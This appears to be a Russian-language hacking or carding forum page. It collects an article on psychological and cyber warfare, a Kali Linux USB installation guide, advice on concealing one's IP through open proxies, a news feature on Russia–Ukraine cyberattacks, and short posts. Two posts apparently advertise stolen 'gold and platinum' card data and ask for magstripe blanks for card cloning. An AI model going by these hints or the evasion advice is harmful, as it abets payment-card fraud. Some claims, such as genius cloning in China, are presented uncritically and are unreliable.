Смирнова в основном лечит от нарко-и алкогольной зависимости. Но в сети много негативных отзывов относительно этой работы. Во время войны в Афганистане по этой методике делались эксперименты по манипулированию сознанием. Мегафоны транслировали моджахедам скрытые в аудиосигнал призывы к сдаче в плен. Но на практике это не принесло результатов. Затем была попытка наладить сотрудничество с американцами при захвате заложников в Техасе. Но там даже не дошло до трансляций. Приходил и С. Мавроди, который хотел иметь аппаратуру, чтобы склонять оппонентов к подписанию контрактов (см. такжездесь). Сам И. Смирнов о сотрудничестве с ФБР рассказывал следующее. Он предложил закодировать голоса детей и родственников, которые звали самоубийц домой, в шумы из динамиков полицейских машин. Но американцы не увидели достаточной вероятности успеха. И голоса эти запустили не в скрытом виде, а напрямую. В результате началась паника. Версия американской стороны об этом случае другая. Они спросили, что будет, когда его метод не сработает. «Они перережут друг другу глотки», — ответил Смирнов. И на этом их сотрудничество завершилось, так и не начавшись. Британские военные называют четыре требования, которые следует иметь в виду, если хочешь добиться успеха в операциях воздействия: точная идентификация оптимальной целевой аудитории, определение способности подпасть под влияние этой аудитории, идентификация лучших процессов влияния на эту аудиторию, создание и размещение триггеров, которые могут эффективно и измеряемо изменить поведение аудитории. Относительно разработки месседжа работают следующие три фактора: резонанс: войдет ли месседж в резонанс с аудиторией, чтобы повлиять на его поведение, признание: можно ли ожидать, что аудитория признает месседж, доставка: сможет ли месседж достичь аудитории. Чтобы сделать изменение поведения более научно обоснованным, была предложена модель поведенческих изменений. Она состоит из внешних и внутренних факторов. К внешним относятся физический контекст, социальный и информационный. К внутренним — мотивация и возможности. В рамках всех них выделяются диагностические параметры, которые позволяют работать над изменением поведения. Если в первой модели существует 18 параметров, то в ответ предлагается упрощенная модель из 9 параметров. Продолжается разработка новых научных направлений, которые можно использовать в интересах национальной безопасности. И это понятно, ведь если станешь первым в этой области, у противника не будет возможных вариантов защиты (см. рассказ о новых видах оружия, среди которых есть и нейрооружие). Электронная война сегодня предстает как основная угроза, если вчитаться в слова одного из американских адмиралов: «Электромагнитная киберсреда сейчас настолько важна для военных операций и критическая относительно наших национальных интересов, что мы должны рассматривать ее как поле битвы вместе с другими, а может, и более важным, чем земля, вода, воздух и космос. В будущих войнах НЕ побеждают просто посредством использования электромагнитного спектра и киберпространства, в них будут побеждать в самом электромагнитном киберпространстве». 110 миллионов выделено на кибервойну, среди целей которой стоит и создание карты киберпространства. Когда компьютеры противника перейдут на другую операционную систему, изменится их цвет на карте, пока они не станут снова доступны. Даже можно подсказать солдату, когда его подсознательное видит угрозу. Как видим, современная наука захватывает все новые и новые аспекты функционирования человека. И это настоящий прорыв и освоении новой сферы, поскольку современные методы исследования стали куда более объективными. Все это принципиально новые шаги в использовании исследований мозга для национальной безопасности, если сравнить с более ранними работами, хотя книга, например. Дж. Морено на тему «Исследования мозга и национальная оборона» была выпущена только в 2006 году (Moreno JD Mind wars. Brain research and national defense. — New York, 2006). Некоторые проекты, которые сегодня появились, выглядят почти фантастически. Это, например, проекты по предсказаниям будущего, сделанные венчурным фондом ЦРУ и фирмами по обработке данных. Это, например, фирма Recorded Future. Среди ее задач — сканирование технологического развития, анализ твитов в случае Ливии и анализ писем бен Ладена (см. здесь, здесь издесь). Свой подход они называют темпоральной аналитикой. Сегодня также и один иранский инженер заявил, что он создал машину времени. Правда, следует иметь в виду, что эта машина не отправляет человека в будущее, а дает прогноз на 5-8 лет вперед. Запад скептически отнесся к этим заявлениям о создании машины времени в Иране (см. здесь, здесь, здесь и здесь). А Китай занялся клонированием гениев. Для начала они собрали генетический материал 200 современных гениев со всего мира. Не следует забывать еще об одном информационном объекте, в мониторинге и исследовании которого максимально заинтересованы не только спецслужбы, но и военные. Это социальные сети, где объемы информации превышают возможности ее обработки. К. Леетару (его персональный сайт — www.kalevleetaru.com) занимается анализом больших объемов информации. Использовав супермощный компьютер Nautilus, Леетару на базе тридцатилетнего архива глобальных новостей, а это сто миллионов новостных сообщений предоставляет такие предсказания человеческого поведения, как национальные конфликты и передвижения отдельных индивидов. Этот новостной архив был в свое время создан британским правительством, а сегодня он обслуживается в партнерстве с ЦРУ. Леетару подчеркивает, что официальные медиа имели большее значение при формировании общественного мнения в египетских протестах, чем социальные медиа. Графики Леетару демонстрируют, как все ниже падает оценка президента Египта, после чего начинается революция. Падения, которые были до этого, совпадают с бомбардировкой иракских войск в Кувейте в 1991 г. и вхождением США в Ирак в 2003 году. Эта статья вызвала интерес прессы, что можно увидеть по заголовкам «Суперкомпьютер предсказывает революцию» (см. здесь и здесь). Эта тематика — социальные медиа, общественное мнение и социальные конфликты — оказалась сегодня в центре внимания, потому что дает объективный инструментарий для предсказания существенных политических изменений (см. некоторые взгляды на проблематику здесь, здесь, здесь и здесь). И все это, разумеется, интересует и разведку, и военных. Леетару говорит, что 50 процентов информации ЦРУ сегодня получает из открытых источников. Он подчеркивает, что роль аналитика изменилась, ему не надо выдвигать гипотез, все делают алгоритмы. Леетару шутит: «Большие объемы информации касаются поиска моделей, а не правды, если вы ищете правду, философский департамент в другом месте». Леетару также предупреждает, что не только он научился так работать, противник тоже все это знает. Интернет и социальные медиа стали основной коммуникативной платформой для экстремистов. В своем интервью Леетару говорит, что сроки предсказаний — от нескольких дней до месяцев, но не 10-20 лет, как об этом говорят некоторые исследователи. Точность возможна лишь на краткосрочном расстоянии. Изменения типов угроз требуют внимания к киберпространству. Однако и в этом случае, как считает Либики, надо найти нарратив, под которым вести свои действия (Libicki MC Managing September 12th in cyberspace. — Santa Monica 2013). Хочет ли страна быть жертвой кибератаки? Или она хочет быть проводником международных санкций? Или супердержавой, которая требует уважения? Нарратив также должен найти роль для атакующего. То есть кроме чисто кибернетического аспекта важным становится и гуманитарный. Из всего этого становится ясно, что в исследования информационного пространства сегодня начинается новая фаза. Именно на этом уровне можно получать реальные результаты и ставить прикладные задачи. Военный заказчик в этом случае не является случайным, ведь именно военные могут дать хорошее финансирование, когда исследование основывается на объективных методах анализа.
  21. 1 балл
    Интересная, но сыроватая схема для заработка
  22. 1 балл
    Голд и платина пришли, разбирайте пока не поздно !)
  23. 1 балл
  24. 1 балл
    Если вам хочется иметь портативную флэшку или внешний жёсткий диск с Kali Linux>, то имеется, как минимум, два варианта: установить систему на флэшку создать флэшку с persistent (постоянным хранилищем) Первый вариант похож на обычную установку операционной системы. Но поскольку мы будем устанавливать на флэшку, то получаем портативность – возможность загрузиться на любом компьютере с USB входом. Все изменения, сделанные в системе, сохраняются после перезагрузки. В целом, работа мало чем отличается от работы с обычным компьютером. Второй вариант заключается в создании Live системы на USB носителе (той же самой флэшке). Но поскольку Live система не способна сохранять изменения (пользовательские файлы, настройки системы), для неё дополнительно создаётся ещё один раздел, на который сохраняются файлы и сделанные настройки. Т.е., казалось бы, получается примерно как в первом варианте – имеется система, которая «помнит» сделанные изменения после перезапуска. На самом деле, есть некоторые нюансы. Live система с persistent сама по себе занимает меньше места – столько же, сколько скаченный ISO образ – т.е. обычно до четырёх гигабайт. Операционная система, установленная обычным образом, занимает около 13-15 гигабайт. Зато установленная обычным образом система быстрее загружается, поскольку в Live используется сжатие. Live система с persistent может столкнуться с проблемой, когда новое ядро (которое возможно обновить), будет несовместимо со старым загрузчиком (который является частью Live образа и не обновляется). В целом, оба способа заслуживают право на существование, и они оба будут рассмотрены на страницах HackWare.ru. В этой инструкции будет показано, как создать флэшку с установленной Kali Linux. Будет описан подробный порядок действий, позволяющий избежать некоторых проблем, которые могут возникнуть при установке системы на USB носитель или при загрузке с USB флэшки или внешнего диска. Инструкция по установке Kali Linux на USB карту памяти Установка на USB флэшку похожа на установку на внутренний диск. Но чтобы случайным образом не повредить основную систему компьютера, жёсткие диски компьютера или загрузчик основной системы, я предлагаю сделать установку Kali Linux на USB флэшку в виртуальном компьютере. После окончания этой установки вы сможете в вашем реальном компьютере загрузиться с этой флэшки. В качестве виртуального компьютера я использую VirtualBox. Я исхожу из того, что VirtualBox у вас уже установлен, или вы сами знаете, как его установить. В VirtualBox создайте новый виртуальный компьютер. Самый обычный виртуальный компьютер для Linux. Единственное отличие – у него не должно быть (виртуального) жёсткого диска. Когда в процессе создания нового виртуального компьютера дойдёте до окна Жёсткий диск, то выберите «Не подключать виртуальный жёсткий диск»: Когда виртуальная машина создана, запустите её. В качестве ISO рекомендуются официальные выпуски (а не еженедельные автоматические сборки). При попытке использовать еженедельные сборки у меня появлялись ошибки, связанные с невозможностью загрузить модули ядра, и установка завершалась неудачей. USB флэшка для Kali Linux Для Kali Linux, а также для любого современного дистрибутива Linux я рекомендую карты памяти объёмом более 16 гигабайт. Т.е. это 32 гигабайта или больше. Чем выше скорость – тем лучше. Флэшки плохо подходят для нескольких одновременных операций чтения/записи, а операционные системы работают именно в таком режиме. Даже с хорошей картой памяти ваша система будет работать заметно медленнее настольной, она может «лагать», «тормозить». С плохой (медленной) картой памятью работа может стать затруднительной, некомфортной. Сколько живут USB флэшки с установленной операционной системой Я из тех, кто не щадит свои медиа носители. На мои карты памяти в телефоне я скачиваю торренты, на свои USB флэшки я устанавливаю операционные системы, интенсивно их использую, часто делаю и восстанавливаю полные резервные копии. У меня не сломалось ни одной карты памяти/USB от интенсивного использования. Честно говоря, я считаю мифом рассказы, что карты памяти могут испортиться из-за частого использования. Возможно мне просто везёт. Я хочу сказать, что USB флэшки (по крайней мере некоторые) способны годами «жить» и использоваться с установленной на них операционными системами. Очистка USB карты памяти для установки операционной системы Перед началом установки я рекомендую полностью стереть данные с флэшки (удалить GPT), поскольку в противном случае у меня иногда возникали ошибки с проблемой записи на диск. Это мы сделаем силами самой Live системы, загрузившись со скаченного ISO. Когда появится это меню, вместо выбора пункта «Графическая установка», загрузитесь в систему. Когда загрузитесь в нижнем баре виртуальной машины подключите вашу USB флэшку к системе: Вы можете посмотреть список дисков, но поскольку каких-либо других носителей (жёстких дисков), там нет, то вы увидите только флэшку под именем /dev/sda: 1 fdisk -l Для удаления GPT с диска, если она там есть, выполните: 1 gdisk /dev/sda Для перехода в экспертный режим там введите 1 x Затем для удаления GPT введите 1 z Дважды согласитесь, чтобы полностью очистить диск. Теперь наша флэшка очищена, не вынимая её, перезагрузите виртуальную систему. Теперь в меню выберите «Graphical install»: Инструкция по установке Kali Linux на карту памяти Каких-либо отличий от установки операционной системы нет – всё достаточно стандартно, выбор языка, имени пользователя и т.к. Если у вас с этим проблемы, то, опять же, обратитесь к заметке «Установка Kali Linux». Пожалуй, имеется только небольшой нюанс с разделом подкачки. Нам совершенно не нужен раздел подкачки на флэшке – мы будем использовать ресурсы компьютера напрямую, т.е. всю оперативную память – этого должно хватить сполна. Но даже если это не так, от раздела подкачки на флэшке будет только вред, поскольку он будет очень медленным. Чтобы не допустить создание раздела подкачки, то при переходе к «Разметке дисков» выберите пункт «Вручную»: Выбираете раздел: Выбираете «Да»: Выбираете «СВОБОДНОЕ МЕСТО»: Далее «Создать новый раздел»: В следующем окне, скорее всего, не придётся ничего менять: Выбираете «Первичный»: Выберите «Настройка раздела закончена»: Выбираете «Закончить разметку и записать изменения на диск»: Система жалуется, что не указан ни одни раздел для пространства подкачки и всячески его нахваливает. В нашем случае (установка ОС на флэшку), он действительно не нужен. Выбираем «Нет»: Теперь выбираем «Да»: После этого начнётся обычная установка ОС Kali Linux. Здесь оставьте без изменений: Выберите вашу флэшку: Когда установка закончится (а это может занять больше времени, чем вы ожидали, посколкьу флэшки не такие быстрые как даже обычные жёсткие диски, не говоря об SSD), то отключите виртуальный компьютер. Вы можете перезагрузить ваш реальный компьютер, чтобы загрузиться со свежеустановленной на USB флэшку системы. Загрузка Kali Linux с флэшки Если у вас нет UEFI, то при начале загрузки компьютера нажимайте много раз кнопку Delete или Esc (иногда другую — в зависимости от модели материнской платы — это можно узнать у Гугла). В БИОСе, там где «Порядок загрузки» выберите вашу флэшку. Флэшка в этот момент должна быть вставлена в компьютер, иначе БИОС её не увидит. Если флэшка вставлена, но компьютер её не видит, попробуйте вставлять её в разные гнёзда и каждый раз перезагружайтесь и переходите в БИОС. Если у вас UEFI, то просто так не попадёшь в БИОС. Самый простой способ попасть в БИОС — это ввести в командной строке (от имени администратора): 1 shutdown.exe /r /o После этого появится сообщение, что компьютер перезагрузится менее чем через одну минуту. После перезагрузки попадаем сюда и выбираем «Диагностика»: Теперь выбираем «Дополнительные параметры»: Теперь «Параметры встроенного ПО UEFI»: Ну и «Перезагрузить»: У разных производителей разные БИОСы, поэтому у вас может быть по-другому. Но я покажу на пример своего ноута, чтобы была понятна суть. Переходим во вкладку Boot, там выбираем Boot Option Priorities, смотрим какие там есть варианты: Всего один вариант и точно нет моей флэшки. Ищем Secure Boot и отключаем (Disable): Появляется новый пункт меню OS Mode Selection. В нём выбираем CMS and UEFI OS. Если выбрать только CMS OS, то установленный Windows не будет загружаться. Теперь ищем такой пункт как Fast BIOS Mode и отключаем его (Disable). Это нужно для того, чтобы при загрузке БИОС начал проверять наличие USB устройств: Настало время сохранить изменения и перезагрузится: Но нам опять нужно в БИОС! Поэтому при загрузке нажимаете соответствующую клавишу. У меня эта клавиша — F2. На старом компьютере этой клавишей была Delete. Эту клавишу БИОС сам пишет при загрузке компьютера. Если вы не успеваете посмотреть или не понимаете английский, то посмотрите для вашей модели в Гугле. Либо пробуйте методом перебора. Кроме названных, ещё этой клавишей может быть Esc или какая либо F*. Опять переходите во кладку Boot Option Priorities. Теперь там появилась флэшка. Если вы сделаете как я — на первое место поставите флэшку, а на второе — Windows Boot Manager, то добьётесь следующего эффекта: если флэшка вставлена в компьютер, то будет загружаться Linux с этой флэшки. Если флэшки нет, то загрузится Windows — и не надо лишний раз лезть в БИОС! Не забываем сохранится и перезагружаемся. Решение проблемы «the disc contains an unclean file system» При загрузке Linux вы можете столкнуться с ошибкой: 1 The disc contains an unclean file system (0, 0) Особенно часто эта ошибка появляется при попытке загрузиться с USB флэшки или с внешнего диска. Причина её в том, что настройки GRUB указывают на неверный диск, например, на диск Windows. Система не понимает файловую систему диска и не может продолжить загрузку. Эта проблема решается достаточно просто. Перезагрузите компьютер, и когда появится меню загрузчика GRUB нажмите клавишу e. Вы увидите примерно следующее: Обратите внимание на строку, начинающуюся с linux. В моём случае там присутствует запись 1 root=/dev/sda1 Поскольку при установке в виртуальном компьютере кроме флэшки не было других носителей информации, то ей было присвоено имя /dev/sda1. В реальном компьютере имеется ещё минимум один жёсткий диск, и имя /dev/sda1 могло быть присвоено ему. А флэшка, с которого я пытаюсь загрузиться, теперь имеет другое имя. Этим именем может быть /dev/sdb1, или, /dev/sdc1 или другое (в зависимости от количества дисков в системе). Если вы не знаете новое имя, то просто перебирайте разные варианты. Переместите курсор на имя диска и поменяйте его на /dev/sdb1. После этого нажмите клавишу F10 и дождитесь загрузки. Если загрузка неудачная, то перезапустите компьютер и поменяйте запись на /dev/sdс1 (и так далее по алфавиту), нажмите F10 и проверьте успешность загрузки. После успешной загрузки в систему поменяйте имя загружаемого диска. Например, в моём случае имя диска оказалось /dev/sdс1 (с буквой c). Тогда команда для изменения загрузочного диска будет выглядеть так: 1 2 sudo grub-install --recheck /dev/sdc sudo grub-mkconfig -o /boot/grub/grub.cfg Вместо /dev/sdc подставьте имя вашего диска или флэшки. Теперь при перезагрузке не будет возникать ошибка, а я сразу будут попадать в Kali Linux, установленную на флэшку. Создание резервной копии флэшки с Kali Linux Установка операционной системы на флэшку, а в особенности её последующая настройка и установка программ – это длительный процесс. На тот случай, если флэшка всё-таки сломается или она вам понадобиться, чтобы записать курсовую работу, вы можете сделать её резервную копию. Также рекомендуется делать резервные копии перед установкой видео драйверов или других подобных опасных для ОС экспериментах. Если мы говорим о создании резервной копии ОС, а не отдельных файлов, то лучшим вариантом является клонирование образа всего диска. В случае необходимости это позволит очень быстро вернуть всю операционную систему со всеми настройками. Минусом такого метода является то, что образ с резервной копией будет занимать ровно столько место, какой объём имеет флэшка. Даже если, например, операционная система со всеми файлами занимает только половину объёма USB носителя, то образ будет всё равно объёмом с флэшку. Как уже было сказано, плюсом является то, что не нужно выбирать файлы для синхронизации, вся резервная копия хранится в виде одного файла, восстановление гарантирует полный возврат в исходное состояние. В системах Linux подобный образ можно сделать с помощью программы dd, а для Windows имеется замечательная бесплатная, с открытым исходным кодом утилита Win32 Disk Imager. Запустите Win32 Disk Imager, в качестве Device выберите вашу флэшку, а в поле Image File пропишите путь, куда вы хотите сохранить образ: Когда всё готово, нажмите Read.
  25. 1 балл
  26. 1 балл
  27. 1 балл
    Самое главное, что способно выдать с головой, - реальный IP-адрес пользователя. Зная его, можно получить достаточно полные сведения. Если у вас статический IP, информация будет предоставлена непосредственно о вас, если же вы пользуетесь модемным соединением и у вас динамический IP, станет известно о вашем провайдере, получить у которого сведения о вас не составит труда. Наиболее простой способ скрыть его - использование анонимных http-прокси-серверов. Английское слово "proxy" означает "посредник, полномочный представитель". Прокси-сервер - это посредник между нами и Интернетом. Через него проходят все наши обращения к сайтам, скачиваются файлы. Мощный прокси способен значительно увеличить скорость соединения за счет кэширования и ретрансляции полученных данных. Файлы Интернета сохраняются локально не на компьютере пользователя, а на диске машины, где установлен прокси, а она, как правило, гораздо мощнее и производительнее. Если пользователь хочет открыть какой-либо документ в Сети, а его незадолго до этого открывал или он сам, или другой пользователь данного прокси, то ему будет выдана локальная копия с диска прокси-сервера. Но тут есть одна немаловажная деталь: если данный документ содержит динамически изменяющийся контент, не исключено, что будет выдана устаревшая версия. Поэтому администратор прокси-сервера должен грамотно установить параметры, определяющие устаревание документа. А главное достоинство прокси - при путешествии по Сети вы везде будете оставлять именно его IP-адрес, а не свой собственный. Владелец какого-либо сайта сможет узнать вашу версию системы и браузера, разрешение и количество цветов экрана, дату и время на нашем компьютере, количество страниц, которое вы просмотрели за текущую сессию, и другую второстепенную информацию. Он не узнает главного - кто вы. Если же злоумышленник решит атаковать этот IP, нападению подвергнется не ваш компьютер, а тот, на котором установлен прокси-сервер, а он защищен гораздо лучше. Дело в том, что прокси появились как раз с той целью, чтобы дать возможность всем объединенным в локальную сеть компьютерам выходить в Интернет, используя только одно подключение и, соответственно, один IP. Большинство прокси принадлежат различным организациям, учебным заведениям и т. п. и чужого пользователя к себе просто не пустят. Но существуют и прокси, открытые для посторонних, администраторы которых по недосмотру или с какими-то специальными целями пускают на них всех "с улицы". Как же найти открытый прокси-сервер? Можно воспользоваться каким-нибудь поисковиком, который выведет на нужные сайты. Как правило, это частные странички, посвященные хакингу или сетевой безопасности, где опубликованы списки адресов анонимных прокси, часть из которых, правда, может не работать. Можно самостоятельно поискать открытые прокси с помощью специальных программ - например, широко известного и бесплатно распространяемого творения китайских программистов под названием Proxyhunter, сканирующего заданный диапазон IP-адресов, - но это займет слишком много времени. Самый оптимальный вариант - воспользоваться специальной службой Proxychecker, доступной по адресу: www.proxychecker.ru. Она была открыта компанией "Спай-ЛОГ" в 2001 году и поддерживалась ею до февраля 2002 года, затем обрела самостоятельное существование. Поисковый робот Proxychecker постоянно ищет по всему миру открытые прокси, внося их в свою базу. Уже найденные прокси постоянно проверяются на предмет работоспособности. Достаточно бесплатно зарегистрироваться в этой системе, и вам будет предоставлен огромный список полностью рабочих адресов, где также будет указана страна, которой принадлежит прокси-сервер, и скорость доступа к нему. Подключиться к выбранному прокси-серверу просто. В любом браузере есть функция установки свойств соединения. Нужно найти опцию, отвечающую за соединение через прокси-сервер, и в специальном окне написать имя прокси и его порт, а при необходимости также и параметры для различных сетевых протоколов.
  28. 1 балл
  29. 1 балл
    Не надо наговаривать , все решилось бы и без помощи гарант-сервиса Оплошности бывают у всех! Люди не роботы и бывает случаются косяки.
  30. 1 балл
  31. 1 балл
    Аналогично, про 50к не скажу, однако +10~15 к зарплате имею..
  32. 1 балл
    Да кстати тема не плохая! Было бы не плохо обзавестись предлагаемыми знаниями! +
  33. 1 балл
    Украинские активисты собирают виртуальное ополчение для защиты в информационной войне В воскресенье 2 марта на сайте российского госканала Russia Today творились странные вещи. В заголовках новостей, связанных с Россией, появилось слово Nazi («нацизм»). Выглядело дико: «Российские сенаторы одобрили использование нацистских войск на территории Украины». Администрация сайта заявила о хакерской атаке: «Взломали доступ админа. Сейчас контроль над сайтом восстановлен». Несколько часов спустя кибератаки отбивали уже на Украине — информагентство УНИАН чуть было не «легло» под DDoS-атакой. «Мощнейшая, непрерывная, продолжается до сих пор», — в понедельник предупреждала посетителей администрация сайта. Медийные противники — Russia Today и УНИАН — оказались на передовой современной войны, в которой артиллерийскую подготовку, прорывы «танковых клиньев» и высадку морской пехоты предваряют DDoS-атаки, «боевые вирусы», дезинформация и дискредитация противника в соцсетях и форумах. «Война уже идет, и главная цель в ней — это атака на общественное мнение, — замечает Илья Сачков, руководитель компании Group-IB, специализирующейся на раскрытии киберпреступлений. — Для создания суматохи, неразберихи используются информационные ресурсы — соцсети, блоги и микроблоги». По мнению эксперта, вывод какого-то ресурса из строя, DDoS-атака — это открытый факт агрессии, а манипулирование СМИ и соцсетями — вещь законодательно нерегулируемая и сложно доказуемая. Похоже, Сачков прав. Атаки на RT и УНИАН остаются пока единственными крупными примерами кибепротивоборства России и Украины. Фиксируемые специалистами взломы и DDoS-атаки сайтов — legalru.ru, crownservice.ru (Россия) и una-unco.in.ua, pogromukieva.net (Украина) больше походят на разминку, чем на реальные удары по инфраструктуре. Куда чаще противники, как ударами, обмениваются в соцсетях фэйковыми новостями, компроматом и «вирусными роликами». То появляется переписка, раскрывающая факты финансирования лидера «УДАРа» Виталия Кличко западными странами, то активист Евромайдана сообщает в Facebook о смерти Виктора Януковича, то украинские националисты объявляют, что готовы войти в Крым, если местные татары покажут им склады с оружием. Даже специалисты до конца не понимают, что это: утечка или искусно состряпанная деза. Все может измениться, если к кибервойне подключатся не хакеры-любители, а профессионалы, располагающие инструментами вроде боевого вируса Stuxnet, атаковавшего объекты ядерной инфраструктуры Ирана. На Украине к этому уже начали готовиться: параллельно со всеобщей мобилизацией населения там формируется еще один фронт — виртуальный. «Связаться в личке и быть готовым к бою» «В связи с военной интервенцией РФ против Украины прошу всех, кто имеет технические возможности противостоять врагу в информационной войне, связаться со мной в личке и быть готовым к бою. Будем связываться с силовиками и объединять усилия против внешнего врага», — такое сообщение разместил в LinkedIn Константин Корсун, руководитель «Украинской группы информационной безопасности» (UISG). «Мое сообщение подлинное, — подтвердил Корсун Forbes. — Хочу обратить внимание: мы защищаемся, ни о каких видах нападения или контрнападения речь не идет». Корсун мало похож на заигравшегося в Counter-Strike сисадмина. У 43-летнего полковника в отставке за спиной серьезный послужной список: 10 лет в подразделении по борьбе с киберпреступностью Службы безопасности Украины (СБУ), четыре года в Государственной службе специальной связи и защиты информации Украины, где до ухода на пенсию возглавлял подразделение CERT-UA (компьютерная группа реагирования на чрезвычайные ситуации). В 2009 году Корсун ушел в бизнес, связанный с информационной безопасностью — он возглавляет украинское представительство американской iSight Partners, сотрудничающей с Секретной Службой США и Пентагоном. «Если вы ищете некую «американскую руку» в моей/нашей деятельности, то вы ее не найдете, о связях со спецслужбами США мне неизвестно», — уверяет Корсун, замечая, что многие его коллеги по информационной безопасности работают в украинских отделениях западных банков, ИТ-компаний, интеграторов и провайдеров. Объявленную мобилизацию IT-специалистов Корсун объясняет необходимостью защищать «свое киберпространство». Что именно он собирается делать? В случае массированных DDoS-атак и других видов атак, по словам Корсуна, UISG готово предоставлять онлайн-консультации по вопросам киберзащиты и построения систем безопасности, бесплатно отдавать в аренду программное обеспечение и предоставлять резервные площадки. «В случае атаки на сайт Нацбанка расследованием будут заниматься подразделения по противодействию киберпреступности при МВД Украины и СБУ, а нашу задачу мы видим в быстрейшей ликвидации как самой атаки, так и минимизации ее вредных последствий», — рассуждает Корсун. По его словам, серьезной системы киберзащиты на Украине практически нет. Более-менее грамотно защищаются лишь ресурсы президента Украины, Верховной Рады и еще нескольких органов исполнительной власти. «Даже те крохи, что выделялись на повышение уровня защищенности государственных информационных ресурсов, либо разворовывались, либо использовались не по назначению», — сетует Корсун, замечая при этом, что украинские силовики в общей своей массе деморализованы. Но, оказывается, не все. «На меня можно расчитывать, — отвечает на призыв Корсуна Максим Литвинов, начальник Управления борьбы с киберпреступностью в МВД Украины. — Есть аналитики, есть лаборатория, личный состав без дезертиров. Предлагаю не ждать взломов, а провести пен-тесты (тестирование на проникновение) критических объектов, данные готов обобщить и перезнакомить тестеров с админами потенциальных потерпевших». Сообщение об IT-мобилизации на Украине похоже на PR организации UISG, считает Илья Сачков из Group-IB: «Я знаю, что у американцев сверхмощная киберармия, в России, я думаю, она только зарождается, и уверен, что на Украине ее вообще нет. В условиях кибервойны Украина ничего не сможет сделать своими силами и с помощью ИТ-ополчения». Действительно, признается Корсун, массовых кибератак со стороны России пока не зафиксировано, но «мы не хотим быть застигнутыми врасплох, как это было во время информационной войны в Прибалтике и Грузии». Гонка кибервооружений Вечером 26 апреля 2007 года в Эстонии наступил хаос. Сайты правительственных учреждений, банков, СМИ обрушились под лавиной запросов, идущих от армии зараженных компьютеров со всего мира. Причина массированной DDoS-атаки угадывалась просто — это был ответ на решение таллинских властей перенести памятник советскому Бронзовому солдату. Год спустя, во время пятидневной войны в Южной Осетии, атаке подверглись уже грузинские сайты правительственных ресурсов, банков, медиахолдингов. На сайте МИДа хакеры повесили коллаж из фотографий, намекающих на сходство грузинского лидера с Адольфом Гитлером. «Это было что-то вроде патриотического собора, — вспоминает те события российский эксперт по кибербезопасности. — На русских хакерских форумах собирались добровольцы и ддосили сайты Эстонии, а в 2008 году — уже и Грузии. После тех событий в Талине открыли Центр киберзащиты НАТО». В России борьбой с киберугрозами исторически занимался Центр информационной безопасности (ЦИБ) ФСБ и Бюро специальных технических мероприятий (БСТМ) МВД. Если ЦИБ борется в виртуальном пространстве с иностранными спецслужбами, экстремистскими и преступными организациями, то БСТМ расследует в основном компьютерные преступления. До атаки одного из первых проявлений кибероружия — червя Stuxnet — в России мало кто задумывался о том, что будет происходить в случае перехода войны в виртуальное пространство, замечает эксперт по информационной безопасности Cisco Systems Алексей Лукацкий. По его словам, ситуация изменилась год-два назад, когда российские власти озаботились вопросом противодействия кибернападкам. Приняты нормативные акты, по большей части — секретные, определены стратегические задачи, начат набор людей и проведение различных научно-исследовательских разработок по «кибертематике». В прошлом году Минобороны заявило о готовности создать специальные кибервойска, которые будут отражать атаки со стороны других государств и контратаковать. «Но до структуры, аналогичной американскому киберкомандованию, нам еще далеко», — полагает Алексей Лукацкий. В США за кибервойны и защиту стратегически важных сетей с 2006 года отвечает специальное подразделение Минобороны — US Cyber Command. Здесь работает около 900 человек, но в течение нескольких лет его штат планируется расширить до 5000 человек. Руководителем US Cyber Command долгое время был Кит Александер, возглавлявший Агентство национальной безопасности (АНБ) — «империю зла», разоблаченную Эдвардом Сноуденом. С начала 2011 года Пентагон развивает систему SMISC (Social Media in Strategic Communication), которая отслеживает все политические дискуссии и устанавливает, являются ли они случайным продуктом коллективного разума или пропагандистской операцией со стороны противника. В 2012 году киберподразделение Пентагона — DARPA запустило программу под кодовым названием Plan X — ее целью является «создание революционных технологий, которые позволят понимать, планировать и управлять информвойной в режиме реального времени». Имеется в виду как нанесение ущерба компьютерными программам и технике, так и манипулирование людьми. В 2012 году на свет появилось так называемое «Таллиннское руководство», разработанное независимыми экспертами по заказу НАТО. В нем была сделана попытка применить нормы международного права к киберпространству и распространить уже привычные термины из военного дела на интернет и кибервооружения. «Выводы, сделанные в «Таллиннском руководстве», говорят о том (хотя с этим многие и не согласны), что на угрозу применения кибероружия можно и нужно отвечать реальными бомбежками и авиаударами, — напоминает Лукацкий. — В США такую норму даже зафиксировали в своих доктринах ведения кибервойн и защиты своего виртуального пространства». Эксперты не исключают, что в случае полномасштабного виртуального конфликта России придется иметь дело уже не с Украиной, а с США. «Им было бы глупо не попробовать [разработки] на практике сейчас. А России было бы так же глупо не защищать свое информационное пространство и не пытаться применять такие же методы», — считает Сачков. Пробка от хакеров-активистов Собственные кибероружие и киберподразделения создают многие государства: США, Китай, Россия, Франция и Великобритания. К ним пытаются присоединиться Северная Корея, Иран, Вьетнам, рассказывает Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского». Норвежская антивирусная компания Norman, расследовавшая атаки на нефтяные компании и на правительство страны, обнаружила вирус, который, по их мнению, был создан индийской компанией. Индийцы подали на Norman в суд. В отличие от реальных боевых действий установить заказчика компьютерной атаки сложно. «Выпущенная из шахты ракета однозначно говорит и о начале войны, и об ее инициаторе. В киберпространстве сложно не только определить причины (если она явно не заявлена предварительно), но и идентифицировать лицо, стоящее за кибератакой», — объясняет Лукацкий из Cisco. Например, три крупнейших банка и три медиакомпании Южной Кореи год назад подверглись атаке, в ходе которой были одновременно стерты данные на почти 50 000 компьютеров. В итоге банкоматы перестали принимать деньги, интернет-банкинг приостановил работу, частично было прекращено телевизионное вещание. Южная Корея обвинила в атаке Северную Корею. Но, кто знает, может, это хакеры из другой страны решили проверить созданный ими вирус? Или вирус Stuxnet, который атаковал центрифуги иранских заводов по обогащению урана. Ответственность за этот вирус не взяла на себя ни одна страна. Некоторые эксперты полагали, что за вирусом стояли США, но для полноценного обвинения собранных доказательств не хватило. «Преступники, которые занимаются таргетированными (целенаправленными) атаками, используют не один и не два сервера: зачастую это цепочка серверов, часть которых может находиться в США и Голландии, в то время как другая часть — в Азии, а из Азии направиться куда-нибудь еще, например в Австралию. Пройти по всей цепочке серверов до конца — это одна из серьезнейших проблем для исследователей и полиции, расследующей инциденты», — говорит Гостев из «Лаборатории Касперского». В октябре 2013 года в туннеле израильского города Хайфа образовалась огромная пробка. И все из-за кибератаки на автоматическую систему управления городским движением. Проникновение в систему не было достаточно профессиональным, и эксперты пришли к выводу, что это была проделка хакеров-активистов. Вроде тех, кто сейчас «кладет» сайты СМИ России и Украины.
  34. 1 балл
    Всем привет! Нужны болванки с магниткой HI-CO. Где можно приобрести?
  35. 1 балл
